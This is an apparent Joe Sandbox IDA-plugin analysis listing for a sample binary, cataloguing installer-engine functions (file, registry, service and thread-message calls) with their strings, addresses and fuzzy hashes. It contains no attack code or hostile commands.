                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                            • String ID: Failed to allocate memory for message data$NetFxChainer.cpp
                                                            • API String ID: 2993511968-1624333943
                                                            • Opcode ID: c72d296dcb37608d444e375619be1e3e1ab6c23c3860924cc036c4e08e43520c
                                                            • Instruction ID: 6244ec409e160fc40e6b4e25c8120724f92686aecca1719b4aa23bfd69f425f5
                                                            • Opcode Fuzzy Hash: c72d296dcb37608d444e375619be1e3e1ab6c23c3860924cc036c4e08e43520c
                                                            • Instruction Fuzzy Hash: DA11BFB1200215AFCB059FA8E881E5ABBF5FF09724F144265F924DB351C771E810CB99
                                                            Function 00871F69 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FormatMessageW.KERNEL32(0087428F,0087548E,?,00000000,00000000,00000000,?,80070656,?,?,?,0088E75C,00000000,0087548E,00000000,80070656), ref: 00871F9A
                                                            • GetLastError.KERNEL32(?,?,?,0088E75C,00000000,0087548E,00000000,80070656,?,?,008840BF,0087548E,?,80070656,00000001,crypt32.dll), ref: 00871FA7
                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,0088E75C,00000000,0087548E,00000000,80070656,?,?,008840BF,0087548E), ref: 00871FEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatFreeLastLocalMessage
                                                            • String ID: strutil.cpp
                                                            • API String ID: 1365068426-3612885251
                                                            • Opcode ID: f808d72626ef3d6447d71c1f904123ecc8dd7f5be5c1de5947d8d0de9dc15c59
                                                            • Instruction ID: 931e2e2185df3d990de2b11337f286b2ef305549539a67faac661cdc60999964
                                                            • Opcode Fuzzy Hash: f808d72626ef3d6447d71c1f904123ecc8dd7f5be5c1de5947d8d0de9dc15c59
                                                            • Instruction Fuzzy Hash: BD016576911129BBDB209F98CC09AEE7BACFB04750F118165FD14F7254EB74DE0096E1
                                                            Function 00880721 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 00880791
                                                            Strings
                                                            • Failed to update resume mode., xrefs: 00880762
                                                            • Failed to update name and publisher., xrefs: 0088077B
                                                            • Failed to open registration key., xrefs: 00880748
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: Failed to open registration key.$Failed to update name and publisher.$Failed to update resume mode.
                                                            • API String ID: 47109696-1865096027
                                                            • Opcode ID: 31b16b9a862133054f4c8a663051877747f251868ed5c3c53e05b6059eb99fc6
                                                            • Instruction ID: fc7f98c6cb267311aaa9e188996bb47308f08e7926e0a2a6d42d91b8d46b6cd2
                                                            • Opcode Fuzzy Hash: 31b16b9a862133054f4c8a663051877747f251868ed5c3c53e05b6059eb99fc6
                                                            • Instruction Fuzzy Hash: 63019232A40629FBCB627684DC45FAEBA78FB00B20F100155F500E6251C776AE14AFD5
                                                            Function 008B4DB3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(008BB500,40000000,00000001,00000000,00000002,00000080,00000000,008804BF,00000000,?,0087F4F4,?,00000080,008BB500,00000000), ref: 008B4DCB
                                                            • GetLastError.KERNEL32(?,0087F4F4,?,00000080,008BB500,00000000,?,008804BF,?,00000094,?,?,?,?,?,00000000), ref: 008B4DD8
                                                            • CloseHandle.KERNEL32(00000000,00000000,?,0087F4F4,?,0087F4F4,?,00000080,008BB500,00000000,?,008804BF,?,00000094), ref: 008B4E2C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorFileHandleLast
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 2528220319-2967768451
                                                            • Opcode ID: f93a43de92464dab186fe33f256972a6a28eaf453e97b5a13c643384495f0085
                                                            • Instruction ID: 4429e3e42cdfa8d86265c74d33f4462765848be8c752279d3837a6c6aee1b3e4
                                                            • Opcode Fuzzy Hash: f93a43de92464dab186fe33f256972a6a28eaf453e97b5a13c643384495f0085
                                                            • Instruction Fuzzy Hash: 1701B133681525ABD6225A6C9C06B9F3B54FB41B70F055311FF20EA3E2E770CC1292A1
                                                            Function 008B497A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,00898C76,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 008B49AE
                                                            • GetLastError.KERNEL32(?,00898C76,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,EngineVersion,000002C0,000000B0), ref: 008B49BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorFileLast
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 1214770103-2967768451
                                                            • Opcode ID: c86d0099b06d6d4b543943ec365da6148c6e6939ea773fbddbeb3a3869240a1d
                                                            • Instruction ID: 24f4bd17e0e648359ce5219f1816ad025384d922bfb649f0e6ddf0c535f5b3b3
                                                            • Opcode Fuzzy Hash: c86d0099b06d6d4b543943ec365da6148c6e6939ea773fbddbeb3a3869240a1d
                                                            • Instruction Fuzzy Hash: 1901A232680538B6D22126955C0BFBB2E58FB00B70F114222FF55FA3E2D7B59D1152E2
                                                            Function 00896BEB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49serviceCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ControlService.ADVAPI32(00896AFD,00000001,?,00000001,00000000,?,?,?,?,?,?,00896AFD,00000000), ref: 00896C13
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00896AFD,00000000), ref: 00896C1D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ControlErrorLastService
                                                            • String ID: Failed to stop wusa service.$msuengine.cpp
                                                            • API String ID: 4114567744-2259829683
                                                            • Opcode ID: c5557045746553f21a301faddba6f8ece969ec8e713a1cf34276084b5e491e29
                                                            • Instruction ID: e7752bb4d051c0cd742abdb32ba9edaaee4ae54ffe68f5a15f197307e48f4918
                                                            • Opcode Fuzzy Hash: c5557045746553f21a301faddba6f8ece969ec8e713a1cf34276084b5e491e29
                                                            • Instruction Fuzzy Hash: 6C01FC33A4163967DB20FB699C45EABB7A4FB48B20F014129FD00FB280EA749C0185E5
                                                            Function 008B39AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysAllocString.OLEAUT32(?), ref: 008B39F4
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B3A27
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$AllocFree
                                                            • String ID: `<u$xmlutil.cpp
                                                            • API String ID: 344208780-3482516102
                                                            • Opcode ID: 3aa45b3c1b295d789327030e194a1ce82b5d029b4ac5b95d81dc1d689b24b830
                                                            • Instruction ID: ccc0f8fd16edde23a7a85314c573deea9f2b8b2bf544dcceb709853b21c0b69d
                                                            • Opcode Fuzzy Hash: 3aa45b3c1b295d789327030e194a1ce82b5d029b4ac5b95d81dc1d689b24b830
                                                            • Instruction Fuzzy Hash: 0601AD35A84229B7D7205A999C09EEB3BDCFF46764F20022AFC44EB340D6B4DE009692
                                                            Function 008B3929 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysAllocString.OLEAUT32(?), ref: 008B396E
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B39A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$AllocFree
                                                            • String ID: `<u$xmlutil.cpp
                                                            • API String ID: 344208780-3482516102
                                                            • Opcode ID: e1c312db5a3d10f3a456643399d5f2196a95a3e9d94fc27009d9e53e87324e18
                                                            • Instruction ID: c44647925e5dcf9d80e2007b2d2a39978d1cb8da4bf6835ef877cb367dd19e5c
                                                            • Opcode Fuzzy Hash: e1c312db5a3d10f3a456643399d5f2196a95a3e9d94fc27009d9e53e87324e18
                                                            • Instruction Fuzzy Hash: 6001A231284219ABD7201A988C04EFB3BDCFF42B64F10463AFD44E7340C6F4DE009692
                                                            Function 008B68B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysFreeString.OLEAUT32(?), ref: 008B690F
                                                              • Part of subcall function 008B8713: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 008B8820
                                                              • Part of subcall function 008B8713: GetLastError.KERNEL32 ref: 008B882A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Time$ErrorFileFreeLastStringSystem
                                                            • String ID: `<u$atomutil.cpp$clbcatq.dll
                                                            • API String ID: 211557998-1658759192
                                                            • Opcode ID: 4a92efaa49de15a23a94d86c52023114e64195c341adf20e61d7c257bda970d8
                                                            • Instruction ID: d4861b39744f6080863f8f6d9662731d4d50ab2990e4f08bc89118e1de5b3d59
                                                            • Opcode Fuzzy Hash: 4a92efaa49de15a23a94d86c52023114e64195c341adf20e61d7c257bda970d8
                                                            • Instruction Fuzzy Hash: 470162B190122AFB8B20AF89C8418EAFBA8FB14365B64417AF504EB310E7755E20D7D1
                                                            Function 0088ECC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39threadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 0088ECED
                                                            • GetLastError.KERNEL32 ref: 0088ECF7
                                                            Strings
                                                            • Failed to post elevate message., xrefs: 0088ED25
                                                            • EngineForApplication.cpp, xrefs: 0088ED1B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessagePostThread
                                                            • String ID: EngineForApplication.cpp$Failed to post elevate message.
                                                            • API String ID: 2609174426-4098423239
                                                            • Opcode ID: 4a7817533698c86704daf019521203ce65c07d645c47d62a8640ec6ae5807fed
                                                            • Instruction ID: 1f8cfa9536e547ade0157a4851f9ba1ec5a14a41ee558ef0edf20d909401fe62
                                                            • Opcode Fuzzy Hash: 4a7817533698c86704daf019521203ce65c07d645c47d62a8640ec6ae5807fed
                                                            • Instruction Fuzzy Hash: 94F0F633A40236ABC7206A9C9C09F967B94FF04B34B258228FE64EF281D775CC0187D5
                                                            Function 0087D8DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 0087D903
                                                            • FreeLibrary.KERNEL32(?,?,008748D7,00000000,?,?,0087548E,?,?), ref: 0087D912
                                                            • GetLastError.KERNEL32(?,008748D7,00000000,?,?,0087548E,?,?), ref: 0087D91C
                                                            Strings
                                                            • BootstrapperApplicationDestroy, xrefs: 0087D8FB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressErrorFreeLastLibraryProc
                                                            • String ID: BootstrapperApplicationDestroy
                                                            • API String ID: 1144718084-3186005537
                                                            • Opcode ID: a3dfa855b1f6639c05540be07d183be8a4223d8705b3391c5b8921c498aa3da5
                                                            • Instruction ID: 17e044be736704c6424070de6c375ac0bc9984f9647743b3daa182087e03f89f
                                                            • Opcode Fuzzy Hash: a3dfa855b1f6639c05540be07d183be8a4223d8705b3391c5b8921c498aa3da5
                                                            • Instruction Fuzzy Hash: 55F06832600B26ABC3205F69D804B26FBB4FF04762701C229E929D6520D771EC108BD0
                                                            Function 008B31EB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysAllocString.OLEAUT32(?), ref: 008B3200
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B3230
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$AllocFree
                                                            • String ID: `<u$xmlutil.cpp
                                                            • API String ID: 344208780-3482516102
                                                            • Opcode ID: a2c808df56643d7f480e70cf2ab03ca624449cc3ee24782ce3499df0209fe844
                                                            • Instruction ID: 5426453f1e2af5fc1e367e4af8ccd00d78b1e412ccfff46c626aa7ea0e8b18df
                                                            • Opcode Fuzzy Hash: a2c808df56643d7f480e70cf2ab03ca624449cc3ee24782ce3499df0209fe844
                                                            • Instruction Fuzzy Hash: F2F0BE35181658EBC7310F849C08FAB77E8FB80B62F248129FC08EB310C7B48E1096E1
                                                            Function 008B3498 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysAllocString.OLEAUT32(?), ref: 008B34AD
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B34DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: String$AllocFree
                                                            • String ID: `<u$xmlutil.cpp
                                                            • API String ID: 344208780-3482516102
                                                            • Opcode ID: eed1693e18d91df0c975883476f8e3e6afb8012565e8394b20c5b6adbaad4ab5
                                                            • Instruction ID: c71f216671cdcb0373c28aad297db9a0ceb296376eb5edbc7afd4933c7e1e281
                                                            • Opcode Fuzzy Hash: eed1693e18d91df0c975883476f8e3e6afb8012565e8394b20c5b6adbaad4ab5
                                                            • Instruction Fuzzy Hash: 56F0B431241228A7C7331E449C08E9B77E8FB55B61F14421AFC14D7310C7B5DE5096E5
                                                            Function 0088F2D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 0088F2EE
                                                            • GetLastError.KERNEL32 ref: 0088F2F8
                                                            Strings
                                                            • Failed to post plan message., xrefs: 0088F326
                                                            • EngineForApplication.cpp, xrefs: 0088F31C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessagePostThread
                                                            • String ID: EngineForApplication.cpp$Failed to post plan message.
                                                            • API String ID: 2609174426-2952114608
                                                            • Opcode ID: c4380fd48ad713c7a531e3b9a894d9ebbb2b4e9cde9b4038d3ede80b3bee4fe1
                                                            • Instruction ID: ac262a03b697987acc90828635a45885b071b291dfa4278cc512e4b04efe590a
                                                            • Opcode Fuzzy Hash: c4380fd48ad713c7a531e3b9a894d9ebbb2b4e9cde9b4038d3ede80b3bee4fe1
                                                            • Instruction Fuzzy Hash: 0EF0A733A416356BD621369AAC09E8B7F94FF04B60F014135FE54EB382E674DC0087D5
                                                            Function 0088F3E7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 0088F3FC
                                                            • GetLastError.KERNEL32 ref: 0088F406
                                                            Strings
                                                            • EngineForApplication.cpp, xrefs: 0088F42A
                                                            • Failed to post shutdown message., xrefs: 0088F434
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessagePostThread
                                                            • String ID: EngineForApplication.cpp$Failed to post shutdown message.
                                                            • API String ID: 2609174426-188808143
                                                            • Opcode ID: d59ca5e01ed8a353a51609123d956be6a33c6ab6e84535d7be019edd2ab86b6b
                                                            • Instruction ID: 8fd1b6ddace7007dd8184e9ea847f187b09f8be4b429c36d60095eef282dcbf3
                                                            • Opcode Fuzzy Hash: d59ca5e01ed8a353a51609123d956be6a33c6ab6e84535d7be019edd2ab86b6b
                                                            • Instruction Fuzzy Hash: 2AF0A733A4163567C63126996C0DF877B94FF04B60B014136BE14FB292E675DC0087D5
                                                            Function 008907B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetEvent.KERNEL32(008BB478,00000000,?,00891717,?,00000000,?,0087C287,?,00875405,?,008875A5,?,?,00875405,?), ref: 008907BF
                                                            • GetLastError.KERNEL32(?,00891717,?,00000000,?,0087C287,?,00875405,?,008875A5,?,?,00875405,?,00875445,00000001), ref: 008907C9
                                                            Strings
                                                            • Failed to set begin operation event., xrefs: 008907F7
                                                            • cabextract.cpp, xrefs: 008907ED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorEventLast
                                                            • String ID: Failed to set begin operation event.$cabextract.cpp
                                                            • API String ID: 3848097054-4159625223
                                                            • Opcode ID: a6aec462aee606219059e05c57cd2048d82f5e69f546b7c72dde3725a72e95a6
                                                            • Instruction ID: c8ccfb72813d66ce2a488b350332f175799654e5a3842931088c75b009e3c94f
                                                            • Opcode Fuzzy Hash: a6aec462aee606219059e05c57cd2048d82f5e69f546b7c72dde3725a72e95a6
                                                            • Instruction Fuzzy Hash: 8DF0A737A426356B8A2132995D0AA8B76A4FF04B717154135FE05F7240E665EC40CAD6
                                                            Function 0088EBCB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 0088EBE0
                                                            • GetLastError.KERNEL32 ref: 0088EBEA
                                                            Strings
                                                            • Failed to post apply message., xrefs: 0088EC18
                                                            • EngineForApplication.cpp, xrefs: 0088EC0E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessagePostThread
